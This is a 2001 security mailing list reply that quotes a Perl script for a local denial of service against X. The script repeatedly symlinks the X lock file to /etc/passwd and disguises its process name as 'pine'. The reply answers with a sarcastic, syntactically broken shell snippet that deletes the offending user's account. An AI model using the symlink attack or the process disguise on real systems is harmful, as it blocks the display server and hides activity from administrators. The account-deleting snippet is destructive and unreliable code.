Re: *SERIOUS* local dos in X

[3APA3A <3APA3A () SECURITY NNOV RU>]

Hello ac1d-burN,

This problem was patched long time ago by implementing rmuser script:

something like

#!/bin/sh

if ls -l /tmp/.X0-lock | grep '\->'
then rmuser `ls -l /tmp/.X0-lock | awk 'print ($3)'`
fi

will resolve this problem _completely_....

;)

--Monday, December 10, 2001, 8:50:28 PM, you wrote to vuln-dev () security-focus com:

ab> greetings readers,

ab> #!/usr/bin/perl

ab> # WARNING - WARNING - WARNING - WARNING - WARNING - WARNING
ab> # WARNING - WARNING - WARNING - WARNING - WARNING - WARNING
ab> #
ab> # advanced lokal denial of service attack against X.
ab> #
ab> # short demostration:
ab> # [acidburn@localhost acidburn]$ ./X-d0S.pl
ab> # ---
ab> # [root@localhost root]# X &
ab> # [1] 8639
ab> #
ab> # Fatal server error:
ab> # Server is already active for display 0
ab> # If this server is no longer running, remove /tmp/.X0-lock
ab> # and start again.
ab> ## slightly broken !!!

ab> #!/usr/bin/perl

ab> $EVIL_FILE="/tmp/.X0-lock";

ab> $0 = "pine" ; # ph00l sysadmin with stealth techniqz

ab> system("ln -s /etc/passwd $EVIL_FILE 2&>1");

ab> while(ACIDBURE.IS.ELITE) {
ab>     if (! -e $EVIL_FILE) {
ab>         system("ln -s /etc/passwd $EVIL_FILE 2&>1");
ab>     }
ab> }

ab> greets: Sp0aR and rloxley!

ab> signed,
ab> acid burn

ab> -------------------------------------------------------


-- 
~/ZARAZA
ЭНИАКам - по морде!  (Лем)